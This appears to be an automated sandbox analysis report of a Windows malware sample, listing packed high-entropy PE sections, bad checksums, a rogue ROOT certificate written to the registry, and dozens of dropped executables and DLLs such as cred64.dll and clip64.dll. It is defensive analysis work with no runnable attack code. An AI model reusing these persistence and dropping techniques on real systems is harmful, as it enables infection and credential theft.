Unpacked PE file: 0.2.bUWKfj04aU.exe.8c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;icxmwjzd:EW;luxgzuin:EW; vs :ER;.rsrc:W;.idata :W; :EW;icxmwjzd:EW;luxgzuin:EW;

Source: gold[1].exe.2.dr

Static PE information: 0x88C65EDB [Fri Sep 19 01:09:47 2042 UTC]

Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe

Code function: 26_2_001BC08C LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

26_2_001BC08C

Source: initial sample

Static PE information: section where entry point is pointing to: luxgzuin

Source: clip64.dll.2.dr	Static PE information: real checksum: 0x0 should be: 0x2b5a5
Source: swiiiii.exe.2.dr	Static PE information: real checksum: 0x562fb should be: 0x5eece
Source: gold.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x5b283
Source: NewB[1].exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x6bd55
Source: alexxxxxxxx[1].exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x1c49ab
Source: alexxxxxxxx.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x1c49ab
Source: cred64[1].dll.2.dr	Static PE information: real checksum: 0x0 should be: 0x14318c
Source: gold[1].exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x5b283
Source: NewB.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x6bd55
Source: cred64.dll.2.dr	Static PE information: real checksum: 0x0 should be: 0x14318c
Source: clip64[1].dll.2.dr	Static PE information: real checksum: 0x0 should be: 0x2b5a5
Source: swiiiii[1].exe.2.dr	Static PE information: real checksum: 0x562fb should be: 0x5eece

Source: bUWKfj04aU.exe	Static PE information: section name:
Source: bUWKfj04aU.exe	Static PE information: section name: .idata
Source: bUWKfj04aU.exe	Static PE information: section name:
Source: bUWKfj04aU.exe	Static PE information: section name: icxmwjzd
Source: bUWKfj04aU.exe	Static PE information: section name: luxgzuin
Source: explorgu.exe.0.dr	Static PE information: section name:
Source: explorgu.exe.0.dr	Static PE information: section name: .idata
Source: explorgu.exe.0.dr	Static PE information: section name:
Source: explorgu.exe.0.dr	Static PE information: section name: icxmwjzd
Source: explorgu.exe.0.dr	Static PE information: section name: luxgzuin
Source: cred64[1].dll.2.dr	Static PE information: section name: _RDATA
Source: cred64.dll.2.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Code function: 0_2_00D61000 push ecx; mov dword ptr [esp], 1396ED17h	0_2_00D61010
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Code function: 0_2_00D61039 push 405F94C5h; mov dword ptr [esp], edx	0_2_00D6109F
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Code function: 0_2_00D61039 push 325606AEh; mov dword ptr [esp], esi	0_2_00D610D3
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Code function: 0_2_00D61039 push edx; mov dword ptr [esp], 6F7BB987h	0_2_00D610E1
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Code function: 0_2_00D61039 push 665B66C3h; mov dword ptr [esp], esi	0_2_00D61174
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Code function: 0_2_00D6118A push 03BCB4D5h; mov dword ptr [esp], esp	0_2_00D611A5
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Code function: 0_2_00D6118A push esi; mov dword ptr [esp], eax	0_2_00D611C5
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Code function: 0_2_008DD2A1 push ecx; ret	0_2_008DD29F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD344800BD pushad ; iretd	8_2_00007FFD344800C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0043F5AC push esi; retn 0048h	21_2_0043F5AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0043FC64 push eax; iretd	21_2_0043FC65
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_00440C13 push ecx; ret	21_2_00440C17
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0043FC98 push AA77266Eh; iretd	21_2_0043FC9D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0043FD86 pushfd ; ret	21_2_0043FD87
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Code function: 26_2_001AE0C6 push ecx; ret	26_2_001AE0D9
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Code function: 26_2_001A3440 push ss; ret	26_2_001A3447
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Code function: 26_2_001ADA1C push ecx; ret	26_2_001ADA2F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0043E05C push ss; retf	29_2_0043E099
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0043CE48 push es; retn 0043h	29_2_0043CE49

Source: bUWKfj04aU.exe	Static PE information: section name: entropy: 7.980453073658566
Source: bUWKfj04aU.exe	Static PE information: section name: icxmwjzd entropy: 7.953998794627234
Source: explorgu.exe.0.dr	Static PE information: section name: entropy: 7.980453073658566
Source: explorgu.exe.0.dr	Static PE information: section name: icxmwjzd entropy: 7.953998794627234
Source: alexxxxxxxx[1].exe.2.dr	Static PE information: section name: .text entropy: 7.940192854489615
Source: alexxxxxxxx.exe.2.dr	Static PE information: section name: .text entropy: 7.940192854489615
Source: gold[1].exe.2.dr	Static PE information: section name: .text entropy: 7.996501459948458
Source: gold.exe.2.dr	Static PE information: section name: .text entropy: 7.996501459948458
Source: swiiiii[1].exe.2.dr	Static PE information: section name: .text entropy: 7.992152217310619
Source: swiiiii.exe.2.dr	Static PE information: section name: .text entropy: 7.992152217310619

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob	Jump to behavior
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\JgoflcD9Q8N9LvT5krhponwA.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\ISetup8[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Ee4C8pygmuP2wWmHYlaPNRsj.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\FirstZ[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\g9ls6tmSqvqEPFEPMTLxj5T8.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\7cKVSqTv7NnDDL1Bxf0FokVy.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\A47mXAfrsBDpojX2UlRMyVjb.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File created: C:\Users\user\AppData\Local\Temp\1001152001\DocuWorks.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\emoDG0nH5rlkVVnXgc1mj5b6.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\tH2mUUONokvK3vL8ubpXbilZ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\sx0rXq9mQR9aeLWBWHbPdr14.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\3Qu8OOESjPevn9hgYpoGckO6.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\JLiIrbSzLzOnR0erkK3iGyEU.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\uhjRBnwj8K4T9LYmtd6M66hw.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\wXamxKfyZPmwZrj3GYJOigy8.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\uuRE7gXsEM4RR1NoZUBwtrlp.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\VxBZwWSDvyrtFfizMLyM1BzT.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\hcidkkgbJV63mERAuLfsQa8h.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File created: C:\Users\user\AppData\Local\Temp\1001142001\DocuWorks.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File created: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\DTvgIdE1FHJj9FUSxKWXL2RO.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File created: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\RqikXgL90rwJFOFaZuJPlBKd.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\6kv625NXRIyPYKeDaoPyctw3.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\SN8aMZWrntrM7YJrmHS2jN15.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\NewB[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\RoyNg8B8qjQgITKbssh3ShCc.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\MnKGY5RWTeEWMNUxbLjGgu1v.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\HwwnZ3CpAQLjyKlmGEjpSgAe.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000188001\ISetup8.exe	File created: C:\Users\user\AppData\Local\Temp\u5ps.1.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File created: C:\Users\user\AppData\Local\Temp\1001108001\swiiii.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\Xi37RtmryfYQA7AgXeZvjKIg.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\erPoCjwbFUG1W9A8W6y3CW6b.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\zFwKnsnVeTcdv2qgWZnCYFfo.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\5t4J6LPx9worlCEV5lJ6PESB.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\itMidjIgtoMzghFLrzdYkPDa.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\MpHOHCEEUzMhd1hQeZRzVhhz.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\8UpBCIaVf6AAjxJPhsi6WXaA.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\3kkvcuaTSYv6zr1LL5n1fFGV.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\SSO4jRyuUDShfiudMUcxy9PM.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\1nTmHrERKdzkaXW6uWP0ApYm.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\2pxZ3QGs5RsdEF32wezepFbS.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\KaHPEM2tjHD1595lRxdfqHsL.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\yUsmdV5pQCUMcoI7bnDHRZY9.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\swiiiii[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\wQWWfYa2Wpi02lLWRtocQHQR.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\QGd5vowLDGLbl9fCzFQRFDz6.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\sNUwctL7GkZ5u0NI0scxfcy0.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\TjI0ijcIo0xtphiVp90L9Ox0.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File created: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\UNI7mc4Nnga4yNCGVfbOvnYn.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\1YUCcdc2ns8K2t45poUN7Amx.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\HAM9LOmldo1zWlB6yIg4ket5.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File created: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\EobcTZAHsg9TkKb6ZiDxOQpo.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	File created: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File created: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File created: C:\Users\user\AppData\Local\Temp\1001107001\jok.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\OW0IY6qIxwA2vBNesoWOn7tx.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\9xT7E5Pb81hXRamadrxhTcKa.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\vSXx0NPQvyjoNMnvb7CbbdI3.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\tLniRa1wNfVBc8wtGlFeZuV5.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\clip64[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	File created: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	File created: C:\Users\user\AppData\Local\Temp\1000188001\ISetup8.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File created: C:\Users\user\AppData\Local\Temp\1001084001\random.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\iwNl8K5vXvEOpYcZRlgRArUI.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\wZuV3PgWQZH6WkVb85MHgKez.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\MSGhyVQl8QvU645EqnDaDG5h.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\ikwgyD2WNrub0XxL5g8QM7GI.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\SYo7pMEIUYDach25xrEqQtfo.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\xEsbKulN7hG8EPnegeeycsh4.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\U56AmqiMe1O1Xr1D2Q9NTKco.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\vjbBGdKLPrfqevTO8NoyWGaS.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\e9BFbVGJvYbRX1O9pfx94p87.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\fbQkxrJoAES30cVcdBN8aXwZ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\DocuWorks[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\aCC9Y3uZiPILOE7CPQBm3dqe.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\XOhApkVOUtZE8u9vX17eosOR.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\ZM1H78lrEQNEMSqAF8jMSK2I.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sarra[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\HJ7xEP91cEUeBnkYZsutN6xz.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\6OLUTXGxeOohIVqZzcEJ5alb.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\o8Jx9jV1oAFDNGwS0JdA5742.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	File created: C:\Users\user\AppData\Local\Temp\1000191001\FirstZ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\iWlE1PLcvZdqKeIUsVDIfjKo.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\QgQgG9QxK6KBBiRO6TDiG08X.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\Jow4Yx3Pjb1bpRyZH3KDPaVs.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\zkP3dJByFmLvW6zaaFPB4q1s.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\ULpJp44l4YgbS9xGxpGd4gFD.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\TB8gyY0giMN6fcZjZLzipP7P.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\b135cfRMuAwZwxqPJGvWitOU.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\Gp0jcfXPIousEInbW21jIMsf.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\1abyUXPEgy4bZxyXlnZFcHZ5.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\jEBnyzNlpnxYBpX0SzTsilYc.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\5zJHpAJpIRB1HYZQQAYjkJ25.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\oLeePKVd7zLdWzK9yLk3y6uB.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\duWjVWTrdvxVwAVHrNA8iMHG.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\NVX3Pk7yCVoYnwk8B8rP7BRQ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000191001\FirstZ.exe	File created: C:\ProgramData\wikombernizc\reakuqnanrkn.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\NfgsIliNy2FIhgIHRMVtFDp6.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\bgw33Otai3n3FHEj79p4BuQd.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\0Tp94y9MBurxJFhItxZ95EWw.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\eRuQ9CSoyYCbA7kgv2O4hBGL.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\ZoBfdkTi1TzYd4Qho9RGiD49.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\zTSMwf6EqjBUbab8YHX1tAIc.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\GbMT76fl6mAPfbFsS3x29QL1.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\fCvVPrm4SypzMQ6EiBEadgs1.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\XJI9AFzBIfKNprDgZXpUs99e.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\QxCv5P4RWl5NZ4tvZO0mZrz2.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\3u6RrNmizX68IHHLss9QqKUE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000188001\ISetup8.exe	File created: C:\Users\user\AppData\Local\Temp\u5ps.0.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\jok[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\NzMhoMiQShLnUxfisrCBpUcg.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\UqEUiSMhaNIUaul1PMLhCUwN.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\kj4vlWepIIui5EUsEpaKN5uf.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	File created: C:\Users\user\AppData\Local\Temp\1000187001\4767d2e713f2021e8fe856e3ea638b58.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\alexxxxxxxx[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\dUJDpd3reHboCY5zymPoYWZb.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\yB6Uf0WkvSc9vwkxXb9qHuqG.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\uOTCOcyWGW2C0V1L0OAjLfFo.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\Pictures\QHSpBJfT7rENIQ9ncyZXQ7Pm.exe	Jump to dropped file
